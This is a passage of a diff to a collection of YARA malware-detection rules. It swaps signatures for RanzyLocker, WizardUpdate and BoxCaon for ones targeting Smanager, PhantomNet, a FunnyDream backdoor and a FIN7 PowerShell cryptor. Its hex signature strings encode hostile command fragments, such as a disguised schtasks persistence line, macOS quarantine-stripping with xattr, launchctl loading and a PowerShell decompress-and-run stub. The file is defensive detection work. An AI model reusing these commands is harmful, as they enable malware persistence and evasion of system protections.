-		$s10 = { 33 c0 48 89 44 24 40 48 c7 44 24 48 07 00 00 00 66 89 44 24 30 44 8d 40 26 48 8d 15 [2] 09 00 48 8d 4c 24 30 e8 [2] ff ff 48 83 7c 24 40 00 74 42 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 b9 01 00 1f 00 ff 15 [2] 07 00 48 85 c0 75 1f 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 33 c9 ff 15 [2] 07 00 32 db eb 02 b3 01 48 8b 54 24 48 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 d3 00 00 00 e8 [2] 03 00 84 db 0f 85 ad 00 00 00 e8 3e 36 00 00 84 c0 75 05 e8 c5 36 00 00 e8 ?? 94 ff ff 48 8d 1d [2] 0d 00 48 8d 4c 24 30 e8 [2] ff ff 48 8b f8 48 8d 35 [2] 0d 00 0f 1f }
+		$s1 = { a1 b0 62 41 00 33 c4 50 8d 84 24 d0 00 00 00 64 a3 00 00 00 00 8b da 8b 84 24 ec 00 00 00 8b b4 24 e0 00 00 00 8b bc 24 e4 00 00 00 8b ac 24 e8 00 00 00 8d 54 24 2c 52 89 44 24 28 89 4c 24 2c e8 95 f0 ff ff 33 c0 89 84 24 d8 00 00 00 c7 84 24 88 00 00 00 0f 00 00 00 89 84 24 84 00 00 00 88 44 24 74 6a 17 68 fc 3b 41 00 8d 44 24 78 c6 84 24 e0 00 00 00 01 e8 9e 0b 00 00 6a 02 68 14 3c 41 00 8d 44 24 78 e8 8e 0b 00 00 6a 00 6a 00 6a 00 6a 01 55 ff 15 44 21 41 00 8b e8 55 6a 02 57 53 8b ce 89 6c 24 2c e8 8d fc ff ff 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 53 56 55 ff 15 58 21 41 00 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 57 68 f8 3b 41 00 50 89 44 24 40 ff 15 4c 21 41 00 }
+		$s2 = { 64 a1 00 00 00 00 50 83 ec 60 a1 b0 62 41 00 33 c4 89 44 24 58 53 55 56 57 a1 b0 62 41 00 33 c4 50 8d 44 24 74 64 a3 00 00 00 00 8b 84 24 88 00 00 00 8b ac 24 84 00 00 00 8b f9 89 44 24 18 33 c0 8d 4c 24 1c 51 8b f2 33 db 89 44 24 30 89 44 24 34 89 44 24 38 89 44 24 3c 89 44 24 40 89 44 24 44 89 44 24 48 89 44 24 4c 89 44 24 50 89 44 24 20 89 44 24 24 89 44 24 28 89 44 24 2c ff 15 2c 21 41 00 85 c0 74 21 39 5c 24 1c 74 05 bb 01 00 00 00 8b 44 24 20 }
+		$s3 = { 50 56 8d 4c 24 58 e8 fc f2 ff ff 6a 01 8d 54 24 18 52 8d 44 24 58 50 89 9c 24 88 00 00 00 33 c0 c6 44 24 20 3d e8 0d 01 00 00 83 f8 ff 74 4f 80 bc 24 8c 00 00 00 00 74 16 56 bb 18 3c 41 00 8d 7c 24 54 e8 8f fd ff ff 83 c4 04 84 c0 75 2f 56 bb 20 3c 41 00 8d 7c 24 54 e8 79 fd ff ff 83 c4 04 84 c0 75 19 56 bb 28 3c 41 00 e8 67 fd ff ff 83 c4 04 84 c0 74 07 c7 45 00 04 00 00 00 83 7c 24 68 10 72 19 }
+		$s4 = { 8d 44 24 18 50 8d 4c 24 18 51 6a 1f 53 c7 44 24 28 04 00 00 00 ff 15 3c 21 41 00 81 4c 24 14 00 01 00 00 6a 04 8d 54 24 18 52 6a 1f 53 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 150KB and 9 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 30KB and 3 of them
 }
-rule ARKBIRD_SOLG_Ran_Ranzylocker_Hunting_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_Mal_Smanager_Installer_Module_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect RanzyLocker ransomware"
+		description = "Detect installer module of Smanager (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "0d0c743b-9beb-5413-b5ba-dad75c2ee0b7"
-		date = "2021-03-16"
-		modified = "2021-03-17"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-16/RanzyLocker/Ran_RanzyLocker_Hunting_Mar_2021_1.yar#L1-L24"
+		id = "364285bc-2173-5ff0-85d2-af06051a3b70"
+		date = "2020-12-19"
+		modified = "2020-12-19"
+		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_Smanager_Installer_Module_Nov_2020_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "ec7867e40e4418bb662c8cf5a71566cd261d2040ee5d3afa0bbe2b92ebfef98e"
-		score = 50
-		quality = 53
+		logic_hash = "380d28f6cdea24f807f3c29207eb0b8888ebdfea215c53df164fe080c3917438"
+		score = 75
+		quality = 61
 		tags = "FILE"
-		hash1 = "5d0af3bf0dc7d99fc87d844a0fcd99796b9257ba02d78510422c498d445f0d0d"
+		hash1 = "97a5fe1d2174e9d34cee8c1d6751bf01f99d8f40b1ae0bce205b8f2f0483225c"
 
 	strings:
-		$s1 = "-nolan" fullword wide
-		$s2 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 32 30 32 38 37 38 33 38 33 36 32 39 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 }
-		$s3 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 }
-		$s4 = { 32 32 37 33 37 35 36 32 36 39 36 34 32 32 33 41 32 32 00 00 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 }
-		$s5 = { 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 }
-		$s6 = { 32 32 36 35 37 38 37 34 32 32 33 41 32 32 }
-		$s7 = { 32 32 36 42 36 35 37 39 32 32 33 41 32 32 }
-		$s8 = { 32 32 36 45 36 35 37 34 37 37 36 46 37 32 36 42 32 32 33 41 32 32 }
-		$s9 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 36 32 36 46 36 46 37 34 37 33 37 34 36 31 37 34 37 35 37 33 37 30 36 46 36 43 36 39 36 33 37 39 32 30 36 39 36 37 36 45 36 46 37 32 36 35 36 31 36 43 36 43 36 36 36 31 36 39 36 43 37 35 37 32 36 35 37 33 }
-		$s10 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 37 32 36 35 36 33 36 46 37 36 36 35 37 32 37 39 36 35 36 45 36 31 36 32 36 43 36 35 36 34 32 30 34 45 36 46 }
-		$s11 = { 37 37 36 44 36 39 36 33 32 45 36 35 37 38 36 35 32 30 35 33 34 38 34 31 34 34 34 46 35 37 34 33 34 46 35 30 35 39 32 30 32 46 36 45 36 46 36 39 36 45 37 34 36 35 37 32 36 31 36 33 37 34 36 39 37 36 36 35 }
-		$s12 = { 35 33 34 46 34 36 35 34 35 37 34 31 35 32 34 35 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 35 43 34 35 35 32 34 39 34 34 }
-		$s13 = { 37 32 36 35 36 31 36 34 36 44 36 35 32 45 37 34 37 38 37 34 }
+		$s1 = { 63 6d 64 20 2f 63 20 73 63 68 74 61 73 6b 73 20 2f 46 20 2f 63 72 65 61 74 65 20 2f 74 6e 3a 57 69 6e 64 6f 77 73 5c 55 70 64 61 74 65 20 2f 74 72 20 22 25 73 22 20 20 20 2f 73 63 20 48 4f 55 52 4c 59 }
+		$s2 = { 25 73 5c 73 79 73 74 65 6d 33 32 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 25 73 }
+		$s3 = { 25 73 79 73 74 65 6d 72 6f 6f 74 25 }
+		$s4 = { 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c [1-8] 5c [1-8] 2e 63 61 62 }
+		$s5 = { 53 6d 61 6e 61 67 65 72 5f 73 73 6c 2e 64 6c 6c }
+		$s6 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 4e 54 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 53 76 63 68 6f 73 74 }
+		$s7 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 53 65 72 76 69 63 65 73 5c }
+		$s8 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 61 70 70 70 61 74 63 68 5c }
+		$s9 = "TmV0QmlvcyBNZXNzYWdlciBSZWdpc3Rlcg==" fullword ascii
+		$s10 = { 68 74 74 70 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 68 74 74 70 73 3d 00 00 73 6f 63 6b 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 73 6f 63 6b 73 3d 00 00 68 74 74 70 3d 25 5b 5e 3a 5d 3a 25 64 00 00 00 68 74 74 70 3d }
+		$s11 = "&About VVSup..." fullword wide
+		$s12 = "%d.tmp" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 10 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 90KB and 7 of them
 }
-rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_Mal_Phantomnet_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect WizardUpdate installer on OSX system"
+		description = "Detect PhantomNet (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "50974725-6b45-5f2f-aa76-ae73dc752873"
-		date = "2021-10-22"
-		modified = "2021-10-23"
-		reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_1.yara#L1-L21"
+		id = "16ddcc9a-8254-5d40-adcd-70ebe212fc78"
+		date = "2020-12-19"
+		modified = "2020-12-19"
+		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_PhantomNet_Nov_2020_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "b25145a9aa33c9518e5e0847b50faa8b67d65078ddfbb66de49196a17ddd3137"
+		logic_hash = "a08467f68968fb0dfa82bca5984e1ad823f222946bd0acb62db418556a9a347a"
 		score = 75
-		quality = 75
+		quality = 65
 		tags = "FILE"
-		hash1 = "939cebc99a50989ffbdbb2a6727b914fc9b2382589b4075a9fd3857e99a8c92a3"
-		hash2 = "c5017798275f054ae96c69f5dd0b378924c6504a70c399279bbf7f33d990d45b"
-		hash3 = "7067e6a69a8f5fdbabfb00d03320cfc2f3584a83304cbeeca7e8edc3d57bbbd4"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "ea7b2def3335b81048aac8fc372349f38453b676fa833603b7e15c45437f6858"
+		hash2 = "338502691f6861ae54e651a25a08e62eeca9febc6830978a670d44caf3d5d056"
 
 	strings:
-		$s1 = { 48 89 e5 48 83 ec 70 48 89 7d f0 48 c7 45 e0 00 00 00 00 b8 01 00 00 00 48 89 c7 48 89 c6 e8 b8 3b 00 00 31 c9 89 cf 48 89 45 d8 48 c7 45 d0 00 00 00 00 e8 a9 3b 00 00 48 8b 7d f0 48 8d 35 d4 3f 00 00 89 45 cc e8 ba 3b 00 00 48 89 45 e8 48 83 7d e8 00 0f 85 0d 00 00 00 48 c7 45 f8 00 00 00 00 e9 cd 00 00 00 e9 00 00 00 00 48 8b 55 e8 48 8d 7d e0 48 8d 75 d0 e8 70 3b 00 00 48 83 f8 ff 0f 84 9c 00 00 00 48 8b 7d d8 48 8b 45 d8 48 89 7d c0 48 89 c7 e8 76 3b 00 00 48 8b 7d e0 48 89 45 b8 e8 69 3b 00 00 48 8b 4d b8 48 01 c1 48 81 c1 01 00 00 00 48 8b 7d c0 48 89 ce e8 49 3b 00 00 48 89 45 d8 48 8b 45 d8 48 8b 7d d8 48 89 45 b0 e8 3a 3b 00 00 48 8b 4d b0 48 01 c1 48 8b 75 e0 48 8b 7d e0 48 89 4d a8 48 89 75 a0 e8 1e 3b 00 00 48 05 01 00 00 00 48 8b 7d a8 48 8b 75 a0 48 89 c2 e8 0e 3b 00 00 48 8b 7d e0 48 89 45 98 e8 d1 3a 00 00 48 c7 45 }
-		$s2 = { 48 89 e5 48 81 ec 80 01 00 00 48 89 f8 48 8b 0d 7b 31 00 00 48 8b 09 48 89 4d f8 48 89 bd e8 fe ff ff c6 85 e7 fe ff ff 00 48 89 bd b8 fe ff ff 48 89 b5 b0 fe ff ff 48 89 85 a8 fe ff ff e8 9c 01 00 00 c7 85 d4 fe ff ff 00 01 00 00 48 8d 35 0a 2e 00 00 48 8b bd b0 fe ff ff e8 df 28 00 00 e9 00 00 00 00 48 8b bd b0 fe ff ff e8 8e 01 00 00 48 8d 35 ec 2d 00 00 48 89 c7 e8 5b 29 00 00 48 89 85 a0 fe ff ff e9 00 00 00 00 48 8b 85 a0 fe ff ff 48 89 85 d8 fe ff ff 48 83 bd d8 fe ff ff 00 0f 84 c4 00 00 00 e9 00 00 00 00 48 8b bd d8 fe ff ff e8 04 29 00 00 89 85 9c fe ff ff e9 00 00 00 00 8b 85 9c fe ff ff 83 f8 00 0f 95 c1 80 f1 ff f6 c1 01 0f 85 05 00 00 00 e9 75 00 00 00 48 8b 95 d8 fe ff ff 48 8d bd f0 fe ff ff be 00 01 00 00 e8 ca 28 00 00 48 89 85 90 fe ff ff e9 00 00 00 00 48 8b 85 90 fe ff ff 48 83 f8 00 0f 84 3b 00 00 00 48 8d b5 f0 fe ff ff 48 8b bd b8 fe ff ff }
-		$s3 = "11101000010110101110100011010010110110101100101011011110111010101110100001000000011100100110000001100000010000000101101010011000010000000100010011010000111010001110100011100000111001100111010001011110010111101101101"
-		$s4 = { 48 8b bd d8 fe ff ff e8 73 28 00 00 e9 00 00 00 00 e9 00 00 00 00 c6 85 e7 fe ff ff 01 f6 85 e7 fe ff ff 01 0f 85 0c 00 00 00 48 8b bd b8 fe ff ff e8 cb 27 00 00 48 8b 05 fc 2f 00 00 48 8b 00 48 8b 4d f8 48 39 c8 0f 85 32 00 00 00 48 8b 85 a8 fe ff ff 48 81 c4 80 01 00 }
+		$s1 = { 25 73 25 30 38 58 }
+		$s2 = { 68 00 74 00 74 00 70 00 5c 00 73 00 68 00 65 00 6c 00 6c 00 5c 00 6f 00 70 00 65 00 6e 00 5c 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 }
+		$s3 = { 6b 25 34 64 2d 25 30 32 64 2d 25 30 32 64 }
+		$s4 = { 47 6c 6f 62 61 6c 5c 47 6c 6f 62 61 6c 41 63 70 72 6f 74 65 63 74 4d 75 74 65 78 }
+		$s5 = "Proxy-Authorization: NTLM" fullword ascii
+		$s6 = { 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a }
+		$s7 = { 48 54 54 50 2f 31 2e 31 20 00 00 00 48 54 54 50 2f 31 2e 30 20 }
+		$s8 = { 52 00 6f 00 6f 00 74 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 00 00 57 51 4c }
+		$s9 = { 68 74 74 70 00 00 00 00 25 5b 5e 3a 5d 00 00 00 25 2a 5b 5e 3a 5d 3a 25 64 }
+		$s10 = { 48 6f 73 74 3a 20 }
+		$s11 = { 43 6f 6f 6b 69 65 73 3a 20 }
+		$s12 = "Proxy-Authenticate: NTLM" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0xFEEDFACF and filesize > 50KB and ( ( $s1 and $s3 ) or ( $s2 and $s4 ) )
+		uint16( 0 ) == 0x5a4d and filesize > 90KB and 9 of them
 }
-rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_2 : FILE
+rule ARKBIRD_SOLG_Mal_Funnydream_Backdoor_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect a structure like the bash of WizardUpdate installer on OSX system"
+		description = "Detect backdoor used by FunnyDream (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "3e48c2fa-10f4-5152-90e6-f5f8cc507103"
-		date = "2021-10-22"
-		modified = "2021-10-23"
-		reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_2.yara#L1-L20"
+		id = "48120ba2-adaa-5098-8d8c-5c32bbafb9f6"
+		date = "2020-12-19"
+		modified = "2020-12-19"
+		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_FunnyDream_Backdoor_Nov_2020_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "99d3323e3c155be040fef3beea0a55aec9bd3178df822d5fd6530864186446ed"
+		logic_hash = "d12c465c735f09295b382fd5679d411c5114c232dabc22be84151e436f8fa199"
 		score = 75
 		quality = 67
 		tags = "FILE"
-		hash1 = "eafacc44666901a5ea3c81a128e5dd88d0968a400d74ef1da5c2c05dc6dd7a39"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "ce5c8741bffa8de5093d1831d736a7e478a54baa3676da37cde24f38d10f3529"
 
 	strings:
-		$s1 = { 24 28 65 76 61 6c 20 65 63 68 6f 20 7e 24 28 65 63 68 6f 20 24 55 53 45 52 29 29 }
-		$s2 = { 69 66 20 5b 20 21 20 2d 66 20 22 24 [5-15] 22 20 5d 3b 20 74 68 65 6e }
-		$s3 = { 63 75 72 6c 20 2d 2d 72 65 74 72 79 20 [2-3] 2d 66 20 22 }
-		$s4 = { 78 61 74 74 72 20 2d 72 20 2d 64 20 63 6f 6d 2e 61 70 70 6c 65 2e 71 75 61 72 61 6e 74 69 6e 65 }
-		$s5 = { 6c 61 75 6e 63 68 63 74 6c 20 6c 6f 61 64 20 2d 77 }
-		$s6 = { 63 68 6f 77 6e 20 2d 52 20 24 55 53 45 52 }
-		$s7 = { 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 20 65 6e 63 6f 64 69 6e 67 3d 5c 22 55 54 46 2d 38 5c 22 3f 3e 0a 09 3c 21 44 4f 43 54 59 50 45 20 70 6c 69 73 74 20 50 55 42 4c 49 43 20 5c 22 2d 2f 2f 41 70 70 6c 65 2f 2f 44 54 44 20 50 4c 49 53 54 20 31 2e 30 2f 2f 45 4e 5c 22 20 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 70 6c 65 2e 63 6f 6d 2f 44 54 44 73 2f 50 72 6f 70 65 72 74 79 4c 69 73 74 2d 31 2e 30 2e 64 74 64 5c 22 3e 0a 09 3c 70 6c 69 73 74 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 3e }
+		$s1 = { 25 64 25 64 25 64 20 25 64 3a 25 64 }
+		$s2 = { 73 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 00 00 50 72 6f 78 79 45 6e 61 62 6c 65 00 50 72 6f 78 79 53 65 72 76 65 }
+		$s3 = { 48 41 52 44 57 41 52 45 5c 44 45 53 43 52 49 50 54 49 4f 4e 5c 53 79 73 74 65 6d 5c 43 65 6e 74 72 61 6c 50 72 6f 63 65 73 73 6f 72 5c 30 }
+		$s4 = { 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 75 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 25 75 25 73 25 73 0d 0a 53 65 72 76 65 72 3a 20 53 69 6d 70 6c 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 }
+		$s5 = { 43 4f 4e 4e 45 43 54 20 25 73 3a 25 64 20 48 54 54 50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 31 30 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 29 0d 0a 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a }
+		$s6 = { 31 32 33 34 35 36 00 00 55 73 65 72 2d 30 30 31 }
+		$s7 = { 25 73 20 25 73 25 73 2f 25 73 2f 25 30 38 58 25 30 38 58 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 30 38 58 25 30 38 78 }
+		$s8 = { 63 6c 74 2e 65 78 65 00 44 6c 6c 49 6e 73 74 61 6c 6c 00 53 74 61 72 74 }
+		$s9 = { 32 30 30 20 43 6f 6e 6e 65 63 74 69 6f 6e 20 65 73 74 61 62 6c 69 73 68 65 64 }
+		$s10 = { 5c 63 6d 64 c7 85 e0 fe ff ff 2e 65 78 65 }
 
 	condition:
-		filesize > 2KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 90KB and 6 of them
 }
-rule ARKBIRD_SOLG_Mal_Boxcaon_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_CRIM_FIN7_PS_Cryptor_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect the BoxCaon malware"
+		description = "Detect PS Cryptor used by FIN7 for Diceloader and Carbanak"
 		author = "Arkbird_SOLG"
-		id = "5f456b73-02f9-5dd7-973e-bde20dcddd27"
-		date = "2021-07-01"
-		modified = "2021-07-02"
-		reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_BoxCaon_Jul_2021_1.yara#L1-L22"
+		id = "26361500-c33e-59c8-a53f-a881966c71a7"
+		date = "2021-06-07"
+		modified = "2021-06-07"
+		reference = "https://twitter.com/z0ul_/status/1401795117678219267"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-07/FIN7/CRIM_FIN7_PS_Cryptor_Jun_2021_1.yara#L1-L28"
 		license_url = "N/A"
-		logic_hash = "c7dfce8d7a451817a80897d5cb02cec5aba52f86ece0286353865b7d391e2ffc"
+		logic_hash = "d7eadaa6dec75ecfa2f03860f41b39dbe9e7ffc9e6ad743497586356301ef67c"
 		score = 75
-		quality = 46
+		quality = 55
 		tags = "FILE"
-		hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b"
-		hash2 = "d0b88ab321a05fc94505620c9d02baec4cb1de7bb3b0067de4f8c0d3ba8548b2"
+		hash1 = "944e47dc9da19b753beba173214cdebea2aa3651c402dfacae2dde82c4fdaa43"
+		hash2 = "fada67a9f89429d6c191cd6fef5d75cd7b49eebaa2e40d1dd1f9884b3038a23b"
+		hash3 = "0f083aac77fb734a8e81fb9dff218f0414ac6c4c9a23b2832837fbc2c7e2031d"
+		hash4 = "dc9442838b464e96281a32705c9b5958e4f45dbefd1ef4a885fac9898af0a4b7"
+		hash5 = "fad295cf65552061dc553c21d89d8bbd0b02783c01f5e696232df6a14381c206"
 		tlp = "White"
-		adversary = "IndigoZebra"
+		adversary = "FIN7"
 
 	strings:
-		$s1 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 61 75 74 6f 72 65 6e 61 6d 65 22 3a 20 66 61 6c 73 65 7d }
-		$s2 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 72 65 63 75 72 73 69 76 65 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 65 64 69 61 5f 69 6e 66 6f 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 64 65 6c 65 74 65 64 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 68 61 73 5f 65 78 70 6c 69 63 69 74 5f 73 68 61 72 65 64 5f 6d 65 6d 62 65 72 73 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 6f 75 6e 74 65 64 5f 66 6f 6c 64 65 72 73 22 3a 20 74 72 75 65 2c 22 69 6e 63 6c 75 64 65 5f 6e 6f 6e 5f 64 6f 77 6e 6c 6f 61 64 61 62 6c 65 5f 66 69 6c 65 73 22 3a 20 74 72 75 65 7d }
-		$s3 = "api.dropboxapi.com" fullword ascii
-		$s4 = { 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 00 00 00 22 00 00 00 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 20 3a 20 22 00 00 0d 00 0a 00 44 00 72 00 6f 00 70 00 62 00 6f 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 3a 00 20 00 7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 20 00 22 00 00 00 22 00 7d 00 0d 00 0a 00 00 00 00 00 7b 22 65 72 72 6f 72 5f 73 75 6d 6d 61 72 79 22 00 00 00 00 25 00 73 00 5c 00 25 00 73 00 00 00 7b 22 70 61 74 68 22 3a 20 22 25 73 22 }
-		$s5 = "C:\\Users\\Public\\%d\\" fullword ascii
-		$s6 = { 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 20 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 2c 00 22 00 61 00 75 00 74 00 6f 00 72 00 65 00 6e 00 61 00 6d 00 65 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 22 00 6d 00 75 00 74 00 65 00 22 00 3a 00 20 00 74 00 72 00 75 00 65 00 2c 00 22 00 73 00 74 00 72 00 69 00 63 00 74 00 5f 00 63 00 6f 00 6e 00 66 00 6c 00 69 00 63 00 74 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 7d 00 0d 00 0a 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 2f 00 6f 00 63 00 74 00 65 00 74 00 2d 00 73 00 74 00 72 00 65 00 61 00 6d }
-		$s7 = { 25 73 2f [1-4] 2e 74 78 74 }
-		$s8 = { 25 73 2f [1-4] 2d 25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 2e 74 78 74 }
+		$s1 = { 3d 4e 65 77 2d 4f 62 6a 65 63 74 20 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 44 65 66 6c 61 74 65 53 74 72 65 61 6d 28 5b 49 4f 2e 4d 65 6d 6f 72 79 53 74 72 65 61 6d 5d 5b 42 79 74 65 5b 5d [6-12] 5b 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 5d 3a 3a 44 65 63 6f 6d 70 72 65 73 73 29 }
+		$s2 = { 40 28 5b 49 6e 74 50 74 72 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 29 28 5b 49 6e 74 50 74 72 5d 29 }
